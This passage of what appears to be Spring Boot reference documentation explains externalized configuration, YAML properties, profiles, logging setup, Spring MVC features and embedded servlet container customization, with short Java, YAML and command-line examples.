Application properties outside of your packaged jar (`application.properties`\n including YAML and profile variants).\n. Application properties packaged inside your jar (`application.properties`\n including YAML and profile variants).\n. `@PropertySource` annotations on your `@Configuration` classes.\n. Default properties (specified using `SpringApplication.setDefaultProperties`).\n\nTo provide a concrete example, suppose you develop a `@Component` that uses a\n`name` property:\n\n[source,java,indent=0]\n----\n\timport org.springframework.stereotype.*;\n\timport org.springframework.beans.factory.annotation.*;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\t@Value(\"${name}\")\n\t\tprivate String name;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nYou can bundle an `application.properties` inside your jar that provides a sensible\ndefault `name`. When running in production, an `application.properties` can be provided\noutside of your jar that overrides `name`; and for one-off testing, you can launch with\na specific command line switch (e.g. `java -jar app.jar --name=\"Spring\"`).\n\nThe `RandomValuePropertySource` is useful for injecting random values (e.g. into secrets\nor test cases). 
It can produce integers, longs or strings, e.g.\n\n[source,properties,indent=0]\n----\n\tmy.secret=${random.value}\n\tmy.number=${random.int}\n\tmy.bignumber=${random.long}\n\tmy.number.less.than.ten=${random.int(10)}\n\tmy.number.in.range=${random.int[1024,65536]}\n----\n\nThe `+random.int*+` syntax is `OPEN value (,max) CLOSE` where the `OPEN,CLOSE` are any\ncharacter and `value,max` are integers. If `max` is provided then `value` is the minimum\nvalue and `max` is the maximum (exclusive).\n\n\n\n[[boot-features-external-config-command-line-args]]\n=== Accessing command line properties\nBy default `SpringApplication` will convert any command line option arguments (starting\nwith '`--`', e.g. `--server.port=9000`) to a `property` and add it to the Spring\n`Environment`. As mentioned above, command line properties always take precedence over\nother property sources.\n\nIf you don't want command line properties to be added to the `Environment` you can disable\nthem using `SpringApplication.setAddCommandLineProperties(false)`.\n\n\n\n[[boot-features-external-config-application-property-files]]\n=== Application property files\n`SpringApplication` will load properties from `application.properties` files in the\nfollowing locations and add them to the Spring `Environment`:\n\n. A `\/config` subdir of the current directory.\n. The current directory\n. A classpath `\/config` package\n. The classpath root\n\nThe list is ordered by precedence (locations higher in the list override lower items).\n\nNOTE: You can also <<boot-features-external-config-yaml, use YAML ('.yml') files>> as\nan alternative to '.properties'.\n\nIf you don't like `application.properties` as the configuration file name you can switch\nto another by specifying a `spring.config.name` environment property. You can also refer\nto an explicit location using the `spring.config.location` environment property\n(comma-separated list of directory locations, or file paths).\n\n[indent=0]\n----\n\t$ java -jar myproject.jar --spring.config.name=myproject\n----\n\nor\n\n[indent=0]\n----\n\t$ java -jar myproject.jar --spring.config.location=classpath:\/default.properties,classpath:\/override.properties\n----\n\nIf `spring.config.location` contains directories (as opposed to files) they should end\nin `\/` (and will be appended with the names generated from `spring.config.name` before\nbeing loaded). The default search path `classpath:,classpath:\/config,file:,file:config\/`\nis always used, irrespective of the value of `spring.config.location`. 
In that way you\ncan set up default values for your application in `application.properties` (or whatever\nother basename you choose with `spring.config.name`) and override it at runtime with a\ndifferent file, keeping the defaults.\n\nNOTE: If you use environment variables rather than system properties, most operating\nsystems disallow period-separated key names, but you can use underscores instead (e.g.\n`SPRING_CONFIG_NAME` instead of `spring.config.name`).\n\nNOTE: If you are running in a container then JNDI properties (in `java:comp\/env`) or\nservlet context initialization parameters can be used instead of, or as well as,\nenvironment variables or system properties.\n\n\n\n[[boot-features-external-config-profile-specific-properties]]\n=== Profile specific properties\nIn addition to `application.properties` files, profile specific properties can also be\ndefined using the naming convention `application-{profile}.properties`.\n\nProfile specific properties are loaded from the same locations as standard\n`application.properties`, with profile specific files overriding the default ones.\n\n\n\n[[boot-features-external-config-placeholders-in-properties]]\n=== Placeholders in properties\nThe values in `application.properties` are filtered through the existing `Environment`\nwhen they are used so you can refer back to previously defined values (e.g. from System\nproperties).\n\n[source,properties,indent=0]\n----\n\tapp.name=MyApp\n\tapp.description=${app.name} is a Spring Boot application\n----\n\nTIP: You can also use this technique to create '`short`' variants of existing Spring Boot\nproperties. See the '<<howto.adoc#howto-use-short-command-line-arguments>>' how-to\nfor details.\n\n\n\n[[boot-features-external-config-yaml]]\n=== Using YAML instead of Properties\nhttp:\/\/yaml.org[YAML] is a superset of JSON, and as such is a very convenient format\nfor specifying hierarchical configuration data. The `SpringApplication` class will\nautomatically support YAML as an alternative to properties whenever you have the\nhttp:\/\/code.google.com\/p\/snakeyaml\/[SnakeYAML] library on your classpath.\n\nNOTE: If you use '`starter POMs`' SnakeYAML will be automatically provided via\n`spring-boot-starter`.\n\n\n\n[[boot-features-external-config-loading-yaml]]\n==== Loading YAML\nSpring Boot provides two convenient classes that can be used to load YAML documents. 
The\n`YamlPropertiesFactoryBean` will load YAML as `Properties` and the `YamlMapFactoryBean`\nwill load YAML as a `Map`.\n\nFor example, the following YAML document:\n\n[source,yaml,indent=0]\n----\n\tenvironments:\n\t\tdev:\n\t\t\turl: http:\/\/dev.bar.com\n\t\t\tname: Developer Setup\n\t\tprod:\n\t\t\turl: http:\/\/foo.bar.com\n\t\t\tname: My Cool App\n----\n\nWould be transformed into these properties:\n\n[source,properties,indent=0]\n----\n\tenvironments.dev.url=http:\/\/dev.bar.com\n\tenvironments.dev.name=Developer Setup\n\tenvironments.prod.url=http:\/\/foo.bar.com\n\tenvironments.prod.name=My Cool App\n----\n\nYAML lists are represented as property keys with `[index]` dereferencers,\nfor example this YAML:\n\n[source,yaml,indent=0]\n----\n\t my:\n\t\tservers:\n\t\t\t- dev.bar.com\n\t\t\t- foo.bar.com\n----\n\nWould be transformed into these properties:\n\n[source,properties,indent=0]\n----\n\tmy.servers[0]=dev.bar.com\n\tmy.servers[1]=foo.bar.com\n----\n\nTo bind to properties like that using the Spring `DataBinder` utilities (which is what\n`@ConfigurationProperties` does) you need to have a property in the target bean of type\n`java.util.List` (or `Set`) and you either need to provide a setter, or initialize it\nwith a mutable value, e.g. this will bind to the properties above\n\n[source,java,indent=0]\n----\n\t@ConfigurationProperties(prefix=\"my\")\n\tpublic class Config {\n\t\tprivate List<String> servers = new ArrayList<String>();\n\n\t\tpublic List<String> getServers() {\n\t\t\treturn this.servers;\n\t\t}\n\t}\n----\n\n\n\n[[boot-features-external-config-exposing-yaml-to-spring]]\n==== Exposing YAML as properties in the Spring Environment\nThe `YamlPropertySourceLoader` class can be used to expose YAML as a `PropertySource`\nin the Spring `Environment`. This allows you to use the familiar `@Value` annotation with\nplaceholders syntax to access YAML properties.\n\n\n\n[[boot-features-external-config-multi-profile-yaml]]\n==== Multi-profile YAML documents\nYou can specify multiple profile-specific YAML documents in a single file by\nusing a `spring.profiles` key to indicate when the document applies. For example:\n\n[source,yaml,indent=0]\n----\n\tserver:\n\t\taddress: 192.168.1.100\n\t---\n\tspring:\n\t\tprofiles: development\n\tserver:\n\t\taddress: 127.0.0.1\n\t---\n\tspring:\n\t\tprofiles: production\n\tserver:\n\t\taddress: 192.168.1.120\n----\n\nIn the example above, the `server.address` property will be `127.0.0.1` if the\n`development` profile is active. If the `development` and `production` profiles are *not*\nenabled, then the value for the property will be `192.168.1.100`\n\n\n\n[[boot-features-external-config-yaml-shortcomings]]\n==== YAML shortcomings\nYAML files can't be loaded via the `@PropertySource` annotation. So in the\ncase that you need to load values that way, you need to use a properties file.\n\n\n\n[[boot-features-external-config-typesafe-configuration-properties]]\n=== Typesafe Configuration Properties\nUsing the `@Value(\"${property}\")` annotation to inject configuration properties can\nsometimes be cumbersome, especially if you are working with multiple properties or\nyour data is hierarchical in nature. Spring Boot provides an alternative method\nof working with properties that allows strongly typed beans to govern and validate\nthe configuration of your application. 
For example:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix=\"connection\")\n\tpublic class ConnectionSettings {\n\n\t\tprivate String username;\n\n\t\tprivate InetAddress remoteAddress;\n\n\t\t\/\/ ... getters and setters\n\n\t}\n----\n\nWhen the `@EnableConfigurationProperties` annotation is applied to your `@Configuration`,\nany beans annotated with `@ConfigurationProperties` will be automatically configured\nfrom the `Environment` properties. This style of configuration works particularly well\nwith the `SpringApplication` external YAML configuration:\n\n[source,yaml,indent=0]\n----\n\t# application.yml\n\n\tconnection:\n\t\tusername: admin\n\t\tremoteAddress: 192.168.1.1\n\n\t# additional configuration as required\n----\n\nTo work with `@ConfigurationProperties` beans you can just inject them in the same way\nas any other bean.\n\n[source,java,indent=0]\n----\n\t@Service\n\tpublic class MyService {\n\n\t\t@Autowired\n\t\tprivate ConnectionSettings connection;\n\n\t \t\/\/...\n\n\t\t@PostConstruct\n\t\tpublic void openConnection() {\n\t\t\tServer server = new Server();\n\t\t\tthis.connection.configure(server);\n\t\t}\n\n\t}\n----\n\nIt is also possible to shortcut the registration of `@ConfigurationProperties` bean\ndefinitions by simply listing the properties classes directly in the\n`@EnableConfigurationProperties` annotation:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\t@EnableConfigurationProperties(ConnectionSettings.class)\n\tpublic class MyConfiguration {\n\t}\n----\n\n\n\n[[boot-features-external-config-relaxed-binding]]\n==== Relaxed binding\nSpring Boot uses some relaxed rules for binding `Environment` properties to\n`@ConfigurationProperties` beans, so there doesn't need to be an exact match between\nthe `Environment` property name and the bean property name. Common examples where this\nis useful include underscore separated (e.g. `context_path` binds to `contextPath`), and\ncapitalized (e.g. `PORT` binds to `port`) environment properties.\n\nSpring will attempt to coerce the external application properties to the right type when\nit binds to the `@ConfigurationProperties` beans. If you need custom type conversion you\ncan provide a `ConversionService` bean (with bean id `conversionService`) or custom\nproperty editors (via a `CustomEditorConfigurer` bean).\n\n\n\n[[boot-features-external-config-validation]]\n==== @ConfigurationProperties Validation\nSpring Boot will attempt to validate external configuration, by default using JSR-303\n(if it is on the classpath). You can simply add JSR-303 `javax.validation` constraint\nannotations to your `@ConfigurationProperties` class:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix=\"connection\")\n\tpublic class ConnectionSettings {\n\n\t\t@NotNull\n\t\tprivate InetAddress remoteAddress;\n\n\t\t\/\/ ... getters and setters\n\n\t}\n----\n\nYou can also add a custom Spring `Validator` by creating a bean definition called\n`configurationPropertiesValidator`.\n\nTIP: The `spring-boot-actuator` module includes an endpoint that exposes all\n`@ConfigurationProperties` beans. Simply point your web browser to `\/configprops`\nor use the equivalent JMX endpoint. See the\n'<<production-ready-features.adoc#production-ready-endpoints, Production ready features>>'.\nsection for details.\n\n\n[[boot-features-profiles]]\n== Profiles\nSpring Profiles provide a way to segregate parts of your application configuration and\nmake it only available in certain environments. 
Any `@Component` or `@Configuration` can\nbe marked with `@Profile` to limit when it is loaded:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\t@Profile(\"production\")\n\tpublic class ProductionConfiguration {\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIn the normal Spring way, you can use a `spring.profiles.active`\n`Environment` property to specify which profiles are active. You can\nspecify the property in any of the usual ways, for example you could\ninclude it in your `application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.profiles.active=dev,hsqldb\n----\n\nor specify on the command line using the switch `--spring.profiles.active=dev,hsqldb`.\n\n\n\n[[boot-features-adding-active-profiles]]\n=== Adding active profiles\nThe `spring.profiles.active` property follows the same ordering rules as other\nproperties, the highest `PropertySource` will win. This means that you can specify\nactive profiles in `application.properties` then *replace* them using the command line\nswitch.\n\nSometimes it is useful to have profile specific properties that *add* to the active\nprofiles rather than replace them. The `spring.profiles.include` property can be used\nto unconditionally add active profiles. The `SpringApplication` entry point also has\na Java API for setting additional profiles (i.e. on top of those activated by the\n`spring.profiles.active` property): see the `setAdditionalProfiles()` method.\n\nFor example, when an application with following properties is run using the switch\n`--spring.profiles.active=prod` the `proddb` and `prodmq` profiles will also be activated:\n\n[source,yaml,indent=0]\n----\n\t---\n\tmy.property: fromyamlfile\n\t---\n\tspring.profiles: prod\n\tspring.profiles.include: proddb,prodmq\n----\n\nNOTE: Remember that the `spring.profiles` property can be defined in a YAML document\nto determine when this particular document is included in the configuration. See\n<<howto-change-configuration-depending-on-the-environment>> for more details.\n\n\n\n[[boot-features-programmatically-setting-profiles]]\n=== Programmatically setting profiles\nYou can programmatically set active profiles by calling\n`SpringApplication.setAdditionalProfiles(...)` before your application runs. It is also\npossible to activate profiles using Spring's `ConfigurableEnvironment` interface.\n\n\n\n[[boot-features-profile-specific-configuration]]\n=== Profile specific configuration files\nProfile specific variants of both `application.properties` (or `application.yml`) and\nfiles referenced via `@ConfigurationProperties` are considered as files are loaded.\nSee '<<boot-features-external-config-profile-specific-properties>>' for details.\n\n\n\n[[boot-features-logging]]\n== Logging\nSpring Boot uses http:\/\/commons.apache.org\/logging[Commons Logging] for all internal\nlogging, but leaves the underlying log implementation open. Default configurations are\nprovided for\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/logging\/package-summary.html[Java Util Logging],\nhttp:\/\/logging.apache.org\/log4j\/[Log4J] and\nhttp:\/\/logback.qos.ch\/[Logback].\nIn each case there is console output and file output (rotating, 10 Mb file size).\n\nBy default, If you use the '`Starter POMs`', Logback will be used for logging. Appropriate\nLogback routing is also included to ensure that dependent libraries that use\nJava Util Logging, Commons Logging, Log4J or SLF4J will all work correctly.\n\nTIP: There are a lot of logging frameworks available for Java. 
Don't worry if the above\nlist seems confusing. Generally you won't need to change your logging dependencies and\nthe Spring Boot defaults will work just fine.\n\n\n\n[[boot-features-logging-format]]\n=== Log format\nThe default log output from Spring Boot looks like this:\n\n[indent=0]\n----\n2014-03-05 10:57:51.112 INFO 45469 --- [ main] org.apache.catalina.core.StandardEngine : Starting Servlet Engine: Apache Tomcat\/7.0.52\n2014-03-05 10:57:51.253 INFO 45469 --- [ost-startStop-1] o.a.c.c.C.[Tomcat].[localhost].[\/] : Initializing Spring embedded WebApplicationContext\n2014-03-05 10:57:51.253 INFO 45469 --- [ost-startStop-1] o.s.web.context.ContextLoader : Root WebApplicationContext: initialization completed in 1358 ms\n2014-03-05 10:57:51.698 INFO 45469 --- [ost-startStop-1] o.s.b.c.e.ServletRegistrationBean : Mapping servlet: 'dispatcherServlet' to [\/]\n2014-03-05 10:57:51.702 INFO 45469 --- [ost-startStop-1] o.s.b.c.embedded.FilterRegistrationBean : Mapping filter: 'hiddenHttpMethodFilter' to: [\/*]\n----\n\nThe following items are output:\n\n* Date and Time -- Millisecond precision and easily sortable.\n* Log Level -- `ERROR`, `WARN`, `INFO`, `DEBUG` or `TRACE`.\n* Process ID.\n* A `---` separator to distinguish the start of actual log messages.\n* Logger name -- This is usually the source class name (often abbreviated).\n* The log message.\n\n\n\n[[boot-features-logging-console-output]]\n=== Console output\nThe default log configuration will echo messages to the console as they are written. By\ndefault `ERROR`, `WARN` and `INFO` level messages are logged. To also log `DEBUG` level\nmessages to the console you can start your application with a `--debug` flag.\n\n[indent=0]\n----\n\t$ java -jar myapp.jar --debug\n----\n\nIf your terminal supports ANSI, color output will be used to aid readability. You can set\n`spring.output.ansi.enabled` to a\n{dc-spring-boot}\/ansi\/AnsiOutput.Enabled.{dc-ext}[supported value] to override the auto\ndetection.\n\n\n\n[[boot-features-logging-file-output]]\n=== File output\nBy default, log files are written to `spring.log` in your `temp` directory and rotate at\n10 Mb. You can easily customize the output folder by setting the `logging.path` property\n(for example in your `application.properties`). It is also possible to change the filename\nusing a `logging.file` property. Note that if `logging.file` is used, then setting `logging.path` has no effect.\n\nAs with console output, `ERROR`, `WARN` and `INFO` level messages are logged by default.\n\n[[boot-features-custom-log-levels]]\n=== Log Levels\n\nAll the supported logging systems can have the logger levels set in the Spring\n`Environment` (so for example in `application.properties`) using '`+logging.level.*=LEVEL+`'\nwhere '`LEVEL`' is one of TRACE, DEBUG, INFO, WARN, ERROR, FATAL, OFF. Example\n`application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.level.org.springframework.web: DEBUG\n\tlogging.level.org.hibernate: ERROR\n----\n\n\n\n[[boot-features-custom-log-configuration]]\n=== Custom log configuration\n\nThe various logging systems can be activated by including the appropriate libraries on\nthe classpath, and further customized by providing a suitable configuration file in the\nroot of the classpath, or in a location specified by the Spring `Environment` property\n`logging.config`. 
(Note however that since logging is initialized *before* the\n`ApplicationContext` is created, it isn't possible to control logging from\n`@PropertySources` in Spring `@Configuration` files. System properties and the\nconventional Spring Boot external configuration files work just fine.)\n\nDepending on your logging system, the following files will be loaded:\n\n|===\n|Logging System |Customization\n\n|Logback\n|`logback.xml`\n\n|Log4j\n|`log4j.properties` or `log4j.xml`\n\n|JDK (Java Util Logging)\n|`logging.properties`\n|===\n\nTo help with the customization some other properties are transferred from the Spring\n`Environment` to System properties:\n\n|===\n|Spring Environment |System Property |Comments\n\n|`logging.file`\n|`LOG_FILE`\n|Used in default log configuration if defined.\n\n|`logging.path`\n|`LOG_PATH`\n|Used in default log configuration if defined.\n\n|`PID`\n|`PID`\n|The current process ID (discovered if possible and when not already defined as an OS\n environment variable).\n|===\n\nAll the logging systems supported can consult System properties when parsing their\nconfiguration files. See the default configurations in `spring-boot.jar` for examples.\n\nWARNING: There are know classloading issues with Java Util Logging that cause problems\nwhen running from an '`executable jar`'. We recommend that you avoid it if at all\npossible.\n\n\n\n[[boot-features-developing-web-applications]]\n== Developing web applications\nSpring Boot is well suited for web application development. You can easily create a\nself-contained HTTP server using embedded Tomcat or Jetty. Most web applications will\nuse the `spring-boot-starter-web` module to get up and running quickly.\n\nIf you haven't yet developed a Spring Boot web application you can follow the\n\"Hello World!\" example in the\n'<<getting-started.adoc#getting-started-first-application, Getting started>>' section.\n\n\n\n[[boot-features-spring-mvc]]\n=== The '`Spring Web MVC framework`'\nThe Spring Web MVC framework (often referred to as simply '`Spring MVC`') is a rich\n'`model view controller`' web framework. Spring MVC lets you create special `@Controller`\nor `@RestController` beans to handle incoming HTTP requests. Methods in your controller\nare mapped to HTTP using `@RequestMapping` annotations.\n\nHere is a typical example `@RestController` to serve JSON data:\n\n[source,java,indent=0]\n----\n\t@RestController\n\t@RequestMapping(value=\"\/users\")\n\tpublic class MyRestController {\n\n\t\t@RequestMapping(value=\"\/{user}\", method=RequestMethod.GET)\n\t\tpublic User getUser(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t@RequestMapping(value=\"\/{user}\/customers\", method=RequestMethod.GET)\n\t\tList<Customer> getUserCustomers(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t@RequestMapping(value=\"\/{user}\", method=RequestMethod.DELETE)\n\t\tpublic User deleteUser(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\nSpring MVC is part of the core Spring Framework and detailed information is available in\nthe {spring-reference}#mvc[reference documentation]. 
There are also several guides\navailable at http:\/\/spring.io\/guides that cover Spring MVC.\n\n\n\n[[boot-features-spring-mvc-auto-configuration]]\n==== Spring MVC auto-configuration\nSpring Boot provides auto-configuration for Spring MVC that works well with most\napplications.\n\nThe auto-configuration adds the following features on top of Spring's defaults:\n\n* Inclusion of `ContentNegotiatingViewResolver` and `BeanNameViewResolver` beans.\n* Support for serving static resources, including support for WebJars (see below).\n* Automatic registration of `Converter`, `GenericConverter`, `Formatter` beans.\n* Support for `HttpMessageConverters` (see below).\n* Automatic registration of `MessageCodeResolver` (see below)\n* Static `index.html` support.\n* Custom `Favicon` support.\n\nIf you want to take complete control of Spring MVC, you can add your own `@Configuration`\nannotated with `@EnableWebMvc`. If you want to keep Spring Boot MVC features, and\nyou just want to add additional {spring-reference}#mvc[MVC configuration] (interceptors,\nformatters, view controllers etc.) you can add your own `@Bean` of type\n`WebMvcConfigurerAdapter`, but *without* `@EnableWebMvc`.\n\n\n\n[[boot-features-spring-mvc-message-converters]]\n==== HttpMessageConverters\nSpring MVC uses the `HttpMessageConverter` interface to convert HTTP requests and\nresponses. Sensible defaults are included out of the box, for example Objects can be\nautomatically converted to JSON (using the Jackson library) or XML (using the Jackson\nXML extension if available, else using JAXB).\n\nIf you need to add or customize converters you can use Spring Boot's\n`HttpMessageConverters` class:\n[source,java,indent=0]\n----\n\timport org.springframework.boot.autoconfigure.web.HttpMessageConverters;\n\timport org.springframework.context.annotation.*;\n\timport org.springframework.http.converter.*;\n\n\t@Configuration\n\tpublic class MyConfiguration {\n\n\t\t@Bean\n\t\tpublic HttpMessageConverters customConverters() {\n\t\t\tHttpMessageConverter<?> additional = ...\n\t\t\tHttpMessageConverter<?> another = ...\n\t\t\treturn new HttpMessageConverters(additional, another);\n\t\t}\n\n\t}\n----\n\n[[boot-features-spring-message-codes]]\n==== MessageCodesResolver\nSpring MVC has a strategy for generating error codes for rendering error messages\nfrom binding errors: `MessageCodesResolver`. Spring Boot will create one for you if\nyou set the `spring.mvc.message-codes-resolver.format` property `PREFIX_ERROR_CODE` or\n`POSTFIX_ERROR_CODE` (see the enumeration in `DefaultMessageCodesResolver.Format`).\n\n\n\n[[boot-features-spring-mvc-static-content]]\n==== Static Content\nBy default Spring Boot will serve static content from a folder called `\/static` (or\n`\/public` or `\/resources` or `\/META-INF\/resources`) in the classpath or from the root\nof the `ServletContext`. It uses the `ResourceHttpRequestHandler` from Spring MVC so you\ncan modify that behavior by adding your own `WebMvcConfigurerAdapter` and overriding the\n`addResourceHandlers` method.\n\nIn a stand-alone web application the default servlet from the container is also\nenabled, and acts as a fallback, serving content from the root of the `ServletContext` if\nSpring decides not to handle it. 
Most of the time this will not happen (unless you modify\nthe default MVC configuration) because Spring will always be able to handle requests\nthrough the `DispatcherServlet`.\n\nIn addition to the '`standard`' static resource locations above, a special case is made for\nhttp:\/\/www.webjars.org\/[Webjars content]. Any resources with a path in `+\/webjars\/**+` will\nbe served from jar files if they are packaged in the Webjars format.\n\nTIP: Do not use the `src\/main\/webapp` folder if your application will be packaged as a\njar. Although this folder is a common standard, it will *only* work with war packaging\nand it will be silently ignored by most build tools if you generate a jar.\n\n\n\n[[boot-features-spring-mvc-template-engines]]\n==== Template engines\n\nAs well as REST web services, you can also use Spring MVC to serve dynamic HTML content.\nSpring MVC supports a variety of templating technologies including Velocity, FreeMarker\nand JSPs. Many other templating engines also ship their own Spring MVC integrations.\n\nSpring Boot includes auto-configuration support for the following templating engines:\n\n * http:\/\/freemarker.org\/docs\/[FreeMarker]\n * http:\/\/beta.groovy-lang.org\/docs\/groovy-2.3.0\/html\/documentation\/markup-template-engine.html[Groovy]\n * http:\/\/www.thymeleaf.org[Thymeleaf]\n * http:\/\/velocity.apache.org[Velocity]\n\nWhen you're using one of these templating engines with the default configuration, your\ntemplates will be picked up automatically from `src\/main\/resources\/templates`.\n\nTIP: JSPs should be avoided if possible, there are several\n<<boot-features-jsp-limitations, known limitations>> when using them with embedded\nservlet containers.\n\n\n\n[[boot-features-error-handling]]\n==== Error Handling\nSpring Boot provides an `\/error` mapping by default that handles all errors in a\nsensible way, and it is registered as a '`global`' error page in the servlet container.\nFor machine clients it will produce a JSON response with details of the error, the HTTP\nstatus and the exception message. For browser clients there is a '`whitelabel`' error\nview that renders the same data in HTML format (to customize it just add a `View` that\nresolves to '`error`'). To replace the default behaviour completely you can implement\n`ErrorController` and register a bean definition of that type, or simply add a bean\nof type `ErrorAttributes` to use the existing mechanism but replace the contents.\n\nIf you want more specific error pages for some conditions, the embedded servlet containers\nsupport a uniform Java DSL for customizing the error handling. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic EmbeddedServletContainerCustomizer containerCustomizer(){\n\t\treturn new MyCustomizer();\n\t}\n\n\t\/\/ ...\n\n\tprivate static class MyCustomizer implements EmbeddedServletContainerCustomizer {\n\n\t\t@Override\n\t\tpublic void customize(ConfigurableEmbeddedServletContainer container) {\n\t\t\tcontainer.addErrorPages(new ErrorPage(HttpStatus.BAD_REQUEST, \"\/400\"));\n\t\t}\n\n\t}\n----\n\nYou can also use regular Spring MVC features like\n{spring-reference}\/#mvc-exceptionhandlers[`@ExceptionHandler` methods] and\n{spring-reference}\/#mvc-ann-controller-advice[`@ControllerAdvice`]. The `ErrorController`\nwill then pick up any unhandled exceptions.\n\nN.B. if you register an `ErrorPage` with a path that will end up being handled by a\n`Filter` (e.g. 
as is common with some non-Spring web frameworks, like Jersey and Wicket),\nthen the `Filter` has to be explicitly registered as an `ERROR` dispatcher, e.g.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic FilterRegistrationBean myFilter() {\n\t\tFilterRegistrationBean registration = new FilterRegistrationBean();\n\t\tregistration.setFilter(new MyFilter());\n\t\t...\n\t\tregistration.setDispatcherTypes(EnumSet.allOf(DispatcherType.class));\n\t\treturn registration;\n\t}\n----\n\n(the default `FilterRegistrationBean` does not include the `ERROR` dispatcher type).\n\n[[boot-features-error-handling-websphere]]\n===== Error Handling on WebSphere Application Server\nWhen deployed to a servlet container, a Spring Boot uses its error page filter to\nforward a request with an error status to the appropriate error page. The request can\nonly be forwarded to the correct error page if the response has not already been\ncommitted. By default, WebSphere Application Server 8.0 and later commits the response\nupon successful completion of a servlet's service method. You should disable this\nbehaviour by setting `com.ibm.ws.webcontainer.invokeFlushAfterService` to `false`\n\n\n\n[[boot-features-jersey]]\n=== JAX-RS and Jersey\nIf you prefer the JAX-RS programming model for REST endpoints you can use one of the\navailable implementations instead of Spring MVC. Jersey 1.x and Apache Celtix work\nquite well out of the box if you just register their `Servlet` or `Filter` as a\n`@Bean` in your application context. Jersey 2.x has some native Spring support so\nwe also provide autoconfiguration support for it in Spring Boot together with a\nstarter.\n\nTo get started with Jersey 2.x just include the `spring-boot-starter-jersey` as a\ndependency and then you need one `@Bean` of type `ResourceConfig` in which you register\nall the endpoints:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\tpublic class JerseyConfig extends ResourceConfig {\n\t\tpublic JerseyConfig() {\n\t\t\tregister(Endpoint.class);\n\t\t}\n\t}\n----\n\nAll the registered endpoints should be `@Components` with HTTP resource annotations\n(`@GET` etc.), e.g.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\t@Path(\"\/hello\")\n\tpublic class Endpoint {\n\n\t\t@GET\n\t\tpublic String message() {\n\t\t\treturn \"Hello\";\n\t\t}\n\n\t}\n----\n\nSince the `Endpoint` is a Spring `@Component` its lifecycle is managed by Spring and you\ncan `@Autowired` dependencies and inject external configuration with `@Value`. The Jersey\nservlet will be registered and mapped to '`\/\\*`' by default. You can change the mapping\nby adding `@ApplicationPath` to your `ResourceConfig`.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-jersey[Jersey sample] so\nyou can see how to set things up. There is also a {github-code}\/spring-boot-samples\/spring-boot-sample-jersey1[Jersey 1.x sample].\nNote that in the Jersey 1.x sample that the spring-boot maven plugin has been configured to\nunpack some Jersey jars so they can be scanned by the JAX-RS implementation (the sample\nasks for them to be scanned in its `Filter` registration.\n\n\n\n[[boot-features-embedded-container]]\n=== Embedded servlet container support\nSpring Boot includes support for embedded Tomcat and Jetty servers. Most developers will\nsimply use the appropriate '`Starter POM`' to obtain a fully configured instance. 
By\ndefault both Tomcat and Jetty will listen for HTTP requests on port `8080`.\n\n\n\n[[boot-features-embedded-container-servlets-and-filters]]\n==== Servlets and Filters\nWhen using an embedded servlet container you can register Servlets and Filters directly as\nSpring beans. This can be particularly convenient if you want to refer to a value from\nyour `application.properties` during configuration.\n\nBy default, if the context contains only a single Servlet it will be mapped to `\/`. In\nthe case of multiple Servlets beans the bean name will be used as a path prefix. Filters\nwill map to `+\/*+`.\n\nIf convention-based mapping is not flexible enough you can use the\n`ServletRegistrationBean` and `FilterRegistrationBean` classes for complete control. You\ncan also register items directly if your bean implements the `ServletContextInitializer`\ninterface.\n\n\n\n[[boot-features-embedded-container-application-context]]\n==== The EmbeddedWebApplicationContext\nUnder the hood Spring Boot uses a new type of `ApplicationContext` for embedded\nservlet container support. The `EmbeddedWebApplicationContext` is a special\ntype of `WebApplicationContext` that bootstraps itself by searching for a single\n`EmbeddedServletContainerFactory` bean. Usually a `TomcatEmbeddedServletContainerFactory`\nor `JettyEmbeddedServletContainerFactory` will have been auto-configured.\n\nNOTE: You usually won't need to be aware of these implementation classes. Most\napplications will be auto-configured and the appropriate `ApplicationContext` and\n`EmbeddedServletContainerFactory` will be created on your behalf.\n\n\n\n[[boot-features-customizing-embedded-containers]]\n==== Customizing embedded servlet containers\nCommon servlet container settings can be configured using Spring `Environment`\nproperties. 
Usually you would define the properties in your `application.properties`\nfile.\n\nCommon server settings include:\n\n* `server.port` -- The listen port for incoming HTTP requests.\n* `server.address` -- The interface address to bind to.\n* `server.sessionTimeout` -- A session timeout.\n\nSee the {sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`]\nclass for a complete list.\n\n\n\n[[boot-features-programmatic-embedded-container-customization]]\n===== Programmatic customization\nIf you need to configure your embdedded servlet container programmatically you can register\na Spring bean that implements the `EmbeddedServletContainerCustomizer` interface.\n`EmbeddedServletContainerCustomizer` provides access to the\n`ConfigurableEmbeddedServletContainer` which includes numerous customization setter\nmethods.\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.context.embedded.*;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class CustomizationBean implements EmbeddedServletContainerCustomizer {\n\n\t\t@Override\n\t\tpublic void customize(ConfigurableEmbeddedServletContainer container) {\n\t\t\tcontainer.setPort(9000);\n\t\t}\n\n\t}\n----\n\n\n\n[[boot-features-customizing-configurableembeddedservletcontainerfactory-directly]]\n===== Customizing ConfigurableEmbeddedServletContainer directly\nIf the above customization techniques are too limited, you can register the\n`TomcatEmbeddedServletContainerFactory` or `JettyEmbeddedServletContainerFactory` bean\nyourself.\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic EmbeddedServletContainerFactory 